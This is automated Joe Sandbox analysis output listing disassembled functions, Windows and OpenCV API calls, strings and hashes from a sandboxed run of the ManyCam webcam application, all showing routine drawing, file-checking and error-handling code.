Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Error$Status
String ID: .\cxmatrix.cpp$In case of inplace column/row transposition both source and destination must be continuous$Inner function failed.$OpenCV function failed$Rectangular matrix can not be transposed inplace$coi is not supported$cvTranspose
API String ID: 483703942-1022153288
Opcode ID: 89d76de47c721aa709fb30abde9849852aaf1abe325fa2cc9fd674aa34d15a8a
Instruction ID: be1ceb17b2f0de3a95756e6b03abe681600bd3c334414968c89e7eda5aa4e8b8
Opcode Fuzzy Hash: 89d76de47c721aa709fb30abde9849852aaf1abe325fa2cc9fd674aa34d15a8a
Instruction Fuzzy Hash: 23A126F27843006BCB249B89FC42B5FB3D1B7A1764F580239FA10963D1E7F5A549C6A2

Function 00473AC0 Relevance: 40.5, APIs: 8, Strings: 15, Instructions: 263memoryCOMMON

Download Yara Rule

APIs

wcsncpy.MSVCR80 ref: 00473B72

Part of subcall function 004749C0: List.LIBCMTD ref: 004749CA

_DebugHeapAllocator.LIBCPMTD ref: 00473BDF
_DebugHeapAllocator.LIBCPMTD ref: 00473BF7
wcsncpy.MSVCR80 ref: 00473C23
_wtoi.MSVCR80 ref: 00473C46
_wtoi.MSVCR80 ref: 00473CA8
_DebugHeapAllocator.LIBCPMTD ref: 00473CE4
memcpy.MSVCR80(00000000,?,00000004,?,?,?,color,font-weight,font-size,font-family,-00000004,00000000,00000000,?,?), ref: 00473D09

Strings

normal, xrefs: 00473C65
Tahoma, xrefs: 00473B66
top, xrefs: 00473D8E
left, xrefs: 00473D22
font-weight, xrefs: 00473C54
text-align, xrefs: 00473D11
bold, xrefs: 00473C82
font-family, xrefs: 00473C00
vertical-align, xrefs: 00473D7D
center, xrefs: 00473D5F
middle, xrefs: 00473DCB
color, xrefs: 00473CBD
right, xrefs: 00473D3F
font-size, xrefs: 00473C2C
bottom, xrefs: 00473DAB

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeap$_wtoiwcsncpy$Listmemcpy
String ID: Tahoma$bold$bottom$center$color$font-family$font-size$font-weight$left$middle$normal$right$text-align$top$vertical-align
API String ID: 2887013889-1516497678
Opcode ID: 788e32562ee1b3e60529b53916602aee49f0928f9813a148764b4366f98aa258
Instruction ID: 2ca92ed9edc0e43fd755dbe637c67a1d90932da1e7afedfaae36012b12e5aafe
Opcode Fuzzy Hash: 788e32562ee1b3e60529b53916602aee49f0928f9813a148764b4366f98aa258
Instruction Fuzzy Hash: 8DB17470600109DFDB04DF65D991AEEBBB4BF14305F10845EE80577392EB38EA59CB65

Function 004F6BD0 Relevance: 38.7, APIs: 15, Strings: 7, Instructions: 165fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,Dynamic), ref: 004F6C39
GetFileSize.KERNEL32(000000FF,00000000), ref: 004F6C72
CloseHandle.KERNEL32(000000FF), ref: 004F6C83

Part of subcall function 00416740: _DebugHeapAllocator.LIBCPMTD ref: 00416795

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,?,Dynamic), ref: 004F6CD4

Strings

You have selected a file with the size larger than 3Mb., xrefs: 004F6D24
The Resource File is corrupted. Please select another., xrefs: 004F6D81
The Resource File is corrupted. Please select another., xrefs: 004F6CE3
You have selected an image with the dimension larger than 3000x2000., xrefs: 004F6DDB
The file size is larger than the maximum allowed (10 Mb)., xrefs: 004F6C89
The Resource File is corrupted. Please select another., xrefs: 004F6C48
Dynamic, xrefs: 004F6C05

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: File$Create$AllocatorCloseDebugHandleHeapSize
String ID: Dynamic$The Resource File is corrupted. Please select another.$The Resource File is corrupted. Please select another.$The Resource File is corrupted. Please select another.$The file size is larger than the maximum allowed (10 Mb).$You have selected a file with the size larger than 3Mb.$You have selected an image with the dimension larger than 3000x2000.
API String ID: 1944681888-4013501048
Opcode ID: db53ed9e86c52f9cf1fd276464b43294e0c4f6e7b9bf3ea5ce6500d8ea47b909
Instruction ID: 602c555bb4c1e2a523d70d8c740280473e2c328c7d9138f782ffa9abfa287272
Opcode Fuzzy Hash: db53ed9e86c52f9cf1fd276464b43294e0c4f6e7b9bf3ea5ce6500d8ea47b909
Instruction Fuzzy Hash: 27613C70A00258ABDB14EF54DC96BEEBB75FB40314F50465AF91AAB2D0CB34AF81DB44

Function 00420D30 Relevance: 37.7, APIs: 25, Instructions: 218windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000005), ref: 00420DA8
GetSysColor.USER32(0000000D), ref: 00420DB3
GetSysColor.USER32(00000008), ref: 00420DBE
CreateSolidBrush.GDI32(00000000), ref: 00420DDA
SetTextColor.GDI32(?,?), ref: 00420DFD
SetBkColor.GDI32(?,?), ref: 00420E0E
CreateSolidBrush.GDI32(?), ref: 00420E18
FillRect.USER32(?,?,?), ref: 00420E30
DeleteObject.GDI32(?), ref: 00420E3A
SetTextColor.GDI32(?,?), ref: 00420E4D
SetBkColor.GDI32(?,?), ref: 00420E5E
CreateSolidBrush.GDI32(?), ref: 00420E68
FillRect.USER32(?,?,?), ref: 00420E80
DeleteObject.GDI32(?), ref: 00420E8A
DrawFocusRect.USER32(?,?), ref: 00420EA3
GetSysColor.USER32(00000011), ref: 00420EFD
SetTextColor.GDI32(?,00000000), ref: 00420F11
SetBkMode.GDI32(?,00000001), ref: 00420F34
wcslen.MSVCR80 ref: 00420F49
TextOutW.GDI32(?,?,?,-0059D15D,00000000), ref: 00420F72
CreateSolidBrush.GDI32(00000000), ref: 00420F7C
FillRect.USER32(?,?,?), ref: 00420F94
DeleteObject.GDI32(?), ref: 00420F9E
FrameRect.USER32(?,?,?), ref: 00420FB3
DeleteObject.GDI32(?), ref: 00420FBD

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Color$Rect$BrushCreateDeleteObjectSolidText$Fill$DrawFocusFrameModewcslen
String ID:
API String ID: 2925841201-0
Opcode ID: 26bd2938b346416d1ad719aebc76d141ac748537c15b6b170e29b0edcf1e6a47
Instruction ID: 66e9c8a567400198a530f2ea5b8cee96818a293c6e558f9a1399f5342b62ddb8
Opcode Fuzzy Hash: 26bd2938b346416d1ad719aebc76d141ac748537c15b6b170e29b0edcf1e6a47
Instruction Fuzzy Hash: 36A1BAB5A00208DFDB08CFD8D9989AEBBB5FF9C310F108119EA19AB355D734A945DF90

Function 00C30830 Relevance: 37.2, APIs: 14, Strings: 7, Instructions: 450COMMON

Download Yara Rule

APIs

cvError.GLU32(000000E5,cvRandArr,Null pointer to RNG state,.\cxrand.cpp,000001D8), ref: 00C3089F
cvInitNArrayIterator.GLU32(00000001,?,00000000,?,?,00000000), ref: 00C308EF

Part of subcall function 00B9F110: cvError.GLU32(000000E5,cvInitArrayOp,Iterator pointer is NULL,.\cxarray.cpp,000001F3,?,?,?,?,00000000,?,?,00000000), ref: 00B9F16C

cvGetErrStatus.GLU32 ref: 00C308F7

Part of subcall function 00BD6D60: malloc.MSVCR80 ref: 00BD6D6E

cvError.GLU32(000000FF,cvRandArr,Inner function failed.,.\cxrand.cpp,000001E7), ref: 00C30916
cvGetMat.GLU32(?,?,?,00000000), ref: 00C3096E
cvGetErrStatus.GLU32 ref: 00C3097A
cvError.GLU32(000000E8,cvRandArr,COI is not supported,.\cxrand.cpp,000001EA), ref: 00C309A9
cvError.GLU32(FFFFFF2E,cvRandArr,00C4124F,.\cxrand.cpp,00000219), ref: 00C30B52
cvErrorFromIppStatus.GLU32(00000000,cvRandArr,OpenCV function failed,.\cxrand.cpp,00000250), ref: 00C30D71
cvError.GLU32(00000000), ref: 00C30D7A

Part of subcall function 00BD6DF0: cvSetErrStatus.GLU32(00000000,00000000,?,00B9107F,000000FC,cvAlloc,Out of memory,.\cxalloc.cpp,0000006F), ref: 00BD6DFD

cvNextNArraySlice.GLU32(?), ref: 00C30DB3

Strings

Unknown distribution type, xrefs: 00C30DD7
Null pointer to RNG state, xrefs: 00C30893
cvRandArr, xrefs: 00C30898, 00C3090F, 00C309A2, 00C30B48, 00C30C2E, 00C30C8A, 00C30D6B, 00C30DDC
OpenCV function failed, xrefs: 00C30D66
.\cxrand.cpp, xrefs: 00C3088E, 00C30905, 00C30998, 00C30B3E, 00C30C24, 00C30C80, 00C30D61, 00C30DD2
Inner function failed., xrefs: 00C3090A
COI is not supported, xrefs: 00C3099D

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Error$Status$Array$FromInitIteratorNextSlicemalloc
String ID: .\cxrand.cpp$COI is not supported$Inner function failed.$Null pointer to RNG state$OpenCV function failed$Unknown distribution type$cvRandArr
API String ID: 2213240858-461928378
Opcode ID: 22b25872eca9fd387e70fe94d1c85c0b442a05d4b8d00b317fb6b1914e5bb72e
Instruction ID: 71792a148c974c111a8ce5f7712a14d985fc6a9fe57b90ebf955973cc33f93dc
Opcode Fuzzy Hash: 22b25872eca9fd387e70fe94d1c85c0b442a05d4b8d00b317fb6b1914e5bb72e
Instruction Fuzzy Hash: D7F13572A047049BC710AF5CF8996AAF7E4FBC4754F310ABDE8C9D2281E632D564C792

Function 00BC8940 Relevance: 37.1, APIs: 17, Strings: 4, Instructions: 357COMMON

Download Yara Rule

APIs

cvError.GLU32(000000E5,cvSeqPartition,00C4124F,.\cxdatastructs.cpp,00000A31), ref: 00BC896F

Part of subcall function 00BD6DF0: cvSetErrStatus.GLU32(00000000,00000000,?,00B9107F,000000FC,cvAlloc,Out of memory,.\cxalloc.cpp,0000006F), ref: 00BD6DFD

cvError.GLU32(000000E5,cvSeqPartition,00C4124F,.\cxdatastructs.cpp,00000A34), ref: 00BC8D59
cvGetErrStatus.GLU32 ref: 00BC8D75
cvError.GLU32(000000FF,cvReleaseMemStorage,Inner function failed.,.\cxdatastructs.cpp,000000DF), ref: 00BC8D94

Strings

cvSeqPartition, xrefs: 00BC8968, 00BC8D52
.\cxdatastructs.cpp, xrefs: 00BC895E, 00BC8D48, 00BC8D83
Inner function failed., xrefs: 00BC8D88
cvReleaseMemStorage, xrefs: 00BC8D8D

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Error$Status
String ID: .\cxdatastructs.cpp$Inner function failed.$cvReleaseMemStorage$cvSeqPartition
API String ID: 483703942-3315114082
Opcode ID: e9ebdbef9babfe5d9d7c2b62e82c27fa7c7a0631d96f04c1bba5008a61334d3b
Instruction ID: 4d077dbe385e5666e44e5da376b2eab0bb61fb5f57fcd06b2da02951f940029f
Opcode Fuzzy Hash: e9ebdbef9babfe5d9d7c2b62e82c27fa7c7a0631d96f04c1bba5008a61334d3b
Instruction Fuzzy Hash: 4DD145B16083408FD724DF18C881B1AB7E5FF98714F1449AEF9898B392DB71E945CB92

Function 004DF9D0 Relevance: 36.8, APIs: 11, Strings: 10, Instructions: 100COMMON

Download Yara Rule

Strings

Static, xrefs: 004DFA91
Objects, xrefs: 004DFA3E
Eyebrow, xrefs: 004DFAFD
Face accessories, xrefs: 004DFABF
Eyeglasses, xrefs: 004DFB11
Backgrounds, xrefs: 004DFA64
Hair, xrefs: 004DFB39
Dynamic, xrefs: 004DFAA8
Hats, xrefs: 004DFB4D
Face, xrefs: 004DFB25

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID:
String ID: Backgrounds$Dynamic$Eyebrow$Eyeglasses$Face$Face accessories$Hair$Hats$Objects$Static
API String ID: 0-1997589367
Opcode ID: 901aaf5dd029739a1d3c8ae11e8e018cde442a6ffa83023b5c9d53f9021075d0
Instruction ID: 0d5221454f0c8e7e8b894d99aff3531fa54f2736b105361686d27a0df3d4384b
Opcode Fuzzy Hash: 901aaf5dd029739a1d3c8ae11e8e018cde442a6ffa83023b5c9d53f9021075d0
Instruction Fuzzy Hash: AC413B30A042199BCB25DF14D8A5BAB7761BB41708F1405BBB41A5B3D0CB79AEC9CB89

Function 00C38160 Relevance: 35.4, APIs: 14, Strings: 6, Instructions: 398COMMON

Download Yara Rule

APIs

cvInitNArrayIterator.GLU32(00000001,?,00000000,?,?,00000000,?,00000000,?), ref: 00C38233
cvGetErrStatus.GLU32(?,?,?,?,00000000,?), ref: 00C3823B
cvError.GLU32(000000FF,cvSum,Inner function failed.,.\cxsumpixels.cpp,000001A4,?,?,?,?,00000000,?), ref: 00C3825A
cvError.GLU32(FFFFFF2D,cvSum,The input array must have at most 4 channels,.\cxsumpixels.cpp,000001A8,?,?,?,?,00000000,?), ref: 00C382A2

Part of subcall function 00BD6DF0: cvSetErrStatus.GLU32(00000000,00000000,?,00B9107F,000000FC,cvAlloc,Out of memory,.\cxalloc.cpp,0000006F), ref: 00BD6DFD

cvError.GLU32(FFFFFF2E,cvSum,00C4124F,.\cxsumpixels.cpp,000001B0,?,?,?,?,00000000,?), ref: 00C382E5

Strings

OpenCV function failed, xrefs: 00C385E4
.\cxsumpixels.cpp, xrefs: 00C38249, 00C3828E, 00C382D1, 00C3837A, 00C38505, 00C3855B, 00C385DF
Inner function failed., xrefs: 00C3824E
Unsupported format, xrefs: 00C3850A
The input array must have at most 4 channels, xrefs: 00C38293, 00C38560
cvSum, xrefs: 00C38253, 00C38298, 00C382DB, 00C38384, 00C3850F, 00C38565, 00C385E9

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Error$Status$ArrayInitIterator
String ID: .\cxsumpixels.cpp$Inner function failed.$OpenCV function failed$The input array must have at most 4 channels$Unsupported format$cvSum
API String ID: 2429443112-1319435761
Opcode ID: fc066ccf7d8c72bb55e41ddb25e2a99a5dd3add1e7447f9ac2d687f4b0b2eda8
Instruction ID: 98cb82cb681dd9b297c41ee655fd3f6190a3fc31ffae694b8bcbe24b25859ec5
Opcode Fuzzy Hash: fc066ccf7d8c72bb55e41ddb25e2a99a5dd3add1e7447f9ac2d687f4b0b2eda8
Instruction Fuzzy Hash: F0C148B1314702A7D720DF99EC81A6BB3E4FB94714F00066DFA99D3281EF71E9588792

Function 0041EA80 Relevance: 35.3, APIs: 16, Strings: 4, Instructions: 259windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004078E0: GetClientRect.USER32(?,00000000), ref: 004078F1

GetSysColorBrush.USER32(0000000F), ref: 0041EAEF
FillRect.USER32(00000000,?,00000000), ref: 0041EB03
LoadIconW.USER32(00000000,00000087), ref: 0041EB51
DrawIconEx.USER32(00000000,0000000A,0000000A,?,00000020,00000020,00000000,00000000,00000003), ref: 0041EB75
DeleteObject.GDI32(?), ref: 0041EB7F
SetBkMode.GDI32(00000000,00000001), ref: 0041EBB2
GetTextColor.GDI32(00000000), ref: 0041EBC1
SetTextColor.GDI32(00000000,00000000), ref: 0041EBD2
memset.MSVCR80 ref: 0041EC7C

Part of subcall function 00417240: CreateFontIndirectW.GDI32(00409661), ref: 0041724B

SelectObject.GDI32(00000000,00000000), ref: 0041ECBC
memset.MSVCR80 ref: 0041ECE8
memset.MSVCR80 ref: 0041ED12
memset.MSVCR80 ref: 0041ED3C
wcslen.MSVCR80 ref: 0041EDE0
DrawTextW.USER32(00000000,?,00000000), ref: 0041EE04
SelectObject.GDI32(00000000,?), ref: 0041EE1C

Strings

Please confirm that ManyCam has permission to add this codec to your computer., xrefs: 0041ECF5
To run ManyCam's dynamic background effects it is necessary to have the Indeo(R) codec installed and registered on your computer., xrefs: 0041ECCD
Verdana, xrefs: 0041EC42
For more information please visit , xrefs: 0041ED1F

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: memset$ColorObjectText$DrawIconRectSelect$BrushClientCreateDeleteFillFontIndirectLoadModewcslen
String ID: For more information please visit $Please confirm that ManyCam has permission to add this codec to your computer.$To run ManyCam's dynamic background effects it is necessary to have the Indeo(R) codec installed and registered on your computer.$Verdana
API String ID: 744489110-1759026381
Opcode ID: 58b7292fdbef0849fd6a32aea5d5f1962e852a66df7108f83bd5b60b6f2a3ebe
Instruction ID: 8647ecc2d404d113b85be19741f6e1cb79f34e612718a269b33a6944d2f87c5b
Opcode Fuzzy Hash: 58b7292fdbef0849fd6a32aea5d5f1962e852a66df7108f83bd5b60b6f2a3ebe
Instruction Fuzzy Hash: 00C147B0D00219DBDB14CF94DC94BEEBBB9BF54304F1081AAE509AB381DB746A89CF54

Function 00C2C9A0 Relevance: 35.2, APIs: 11, Strings: 9, Instructions: 177COMMON

Download Yara Rule

APIs

cvError.GLU32(000000E5,cvSave,NULL object pointer,.\cxpersistence.cpp,000013D7,?,?,?,00BD79AD,?,00000000,?,00000000,00000000,00000000), ref: 00C2CA03

Part of subcall function 00BD6DF0: cvSetErrStatus.GLU32(00000000,00000000,?,00B9107F,000000FC,cvAlloc,Out of memory,.\cxalloc.cpp,0000006F), ref: 00BD6DFD

cvOpenFileStorage.GLU32(?,00000000,00000001,?,?,?,?,00BD79AD,?,00000000,?,00000000,00000000,00000000), ref: 00C2CA16
cvGetErrStatus.GLU32 ref: 00C2CA24
cvError.GLU32(000000FF,cvSave,Inner function failed.,.\cxpersistence.cpp,00001403), ref: 00C2CBA1
cvReleaseFileStorage.GLU32(?), ref: 00C2CBAF

Strings

_, xrefs: 00C2CAD5
cvSave, xrefs: 00C2C9FC, 00C2CA4A, 00C2CAAF, 00C2CB9A
Could not open the file storage. Check the path and permissions, xrefs: 00C2CA45
Invalid filename, xrefs: 00C2CAAA
-, xrefs: 00C2CAF8
Inner function failed., xrefs: 00C2CB95
_, xrefs: 00C2CAFD
.\cxpersistence.cpp, xrefs: 00C2C9F2, 00C2CA40, 00C2CAA5, 00C2CB90
NULL object pointer, xrefs: 00C2C9F7

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: ErrorFileStatusStorage$OpenRelease
String ID: -$.\cxpersistence.cpp$Could not open the file storage. Check the path and permissions$Inner function failed.$Invalid filename$NULL object pointer$_$_$cvSave
API String ID: 3105142120-151502786
Opcode ID: 1b1f38bb7c4a6555796f5418a470fa72241b6bbf6618727b3982d29628b89e00
Instruction ID: e632ee68963caf248072f60b8e983ab311d1c97b1ecd296a713f6837bfdbff09
Opcode Fuzzy Hash: 1b1f38bb7c4a6555796f5418a470fa72241b6bbf6618727b3982d29628b89e00
Instruction Fuzzy Hash: 0251CE70A843696BD730DA18BCC3BEF73D56B55300F080A39FDE567682E6709A499783

Function 00402130 Relevance: 33.7, APIs: 16, Strings: 3, Instructions: 433COMMON

Download Yara Rule

APIs

cvError.CXCORE099(000000FB,cvCylDrawCylinder,Invalid parameter.,.\src\cylaux.cpp,0000009A), ref: 00402670

Part of subcall function 00405340: cvSet.CXCORE099(?,?,?,?,00000000,0040217B), ref: 0040535D

cvGEMM.CXCORE099(?,?), ref: 004021A7
_CIcos.MSVCR80 ref: 004021DD
_CIsin.MSVCR80 ref: 004021EA
cvGEMM.CXCORE099(?,?), ref: 0040225F
cvGEMM.CXCORE099(?,?), ref: 004022C4
cvGEMM.CXCORE099(?,?), ref: 00402325
_CIsqrt.MSVCR80 ref: 004023DC
_CIsqrt.MSVCR80 ref: 004023F7
_CIacos.MSVCR80 ref: 00402431
cvSet2D.CXCORE099(?,?,?), ref: 00402488
_CIcos.MSVCR80 ref: 004024E9
_CIsin.MSVCR80 ref: 00402517
cvGEMM.CXCORE099(?,?), ref: 00402559
cvGEMM.CXCORE099(?,?), ref: 004025DA
cvLine.CXCORE099(?,?,?,?,?), ref: 0040264C

Strings

cvCylDrawCylinder, xrefs: 00402669
.\src\cylaux.cpp, xrefs: 0040265F
Invalid parameter., xrefs: 00402664

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: IcosIsinIsqrt$ErrorIacosLineSet2
String ID: .\src\cylaux.cpp$Invalid parameter.$cvCylDrawCylinder
API String ID: 3689646513-1738803442
Opcode ID: 8deb28bca9f0b0be666a0c88b69cf3ae356be30c15ac8f98f76c123cc54bb843
Instruction ID: ee0604925432baceefbd38c3e5584ac40f80a2529fa49fd9d4d055b72c52293a
Opcode Fuzzy Hash: 8deb28bca9f0b0be666a0c88b69cf3ae356be30c15ac8f98f76c123cc54bb843
Instruction Fuzzy Hash: C8F1A171A05601DBD304AF60D989696BFF0FF84780F614D88E5D4672A9EB3198B4CFC6

Function 00C3E020 Relevance: 33.6, APIs: 12, Strings: 7, Instructions: 395COMMON

Download Yara Rule

APIs

cvError.GLU32(FFFFFF2E,cvSolveCubic,Both matrices should be floating-point (single or double precision),.\cxutils.cpp,0000011F), ref: 00C3E0E8
cvError.GLU32(FFFFFF37,cvSolveCubic,The matrix of roots must be 1-dimensional vector of 3 elements,.\cxutils.cpp,0000012A), ref: 00C3E13A
cvError.GLU32(?,cvSolveCubic,Input parameter is not a valid matrix,.\cxutils.cpp,00000117), ref: 00C3E4B6

Strings

The matrix of coefficients must be 1-dimensional vector of 3 or 4 elements, xrefs: 00C3E123
Output parameter is not a valid matrix, xrefs: 00C3E47C
Both matrices should be floating-point (single or double precision), xrefs: 00C3E0D5
Input parameter is not a valid matrix, xrefs: 00C3E49D
cvSolveCubic, xrefs: 00C3E0DC, 00C3E12A, 00C3E484, 00C3E4A5
.\cxutils.cpp, xrefs: 00C3E0CE, 00C3E11E, 00C3E16E, 00C3E475, 00C3E496
The matrix of roots must be 1-dimensional vector of 3 elements, xrefs: 00C3E173

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
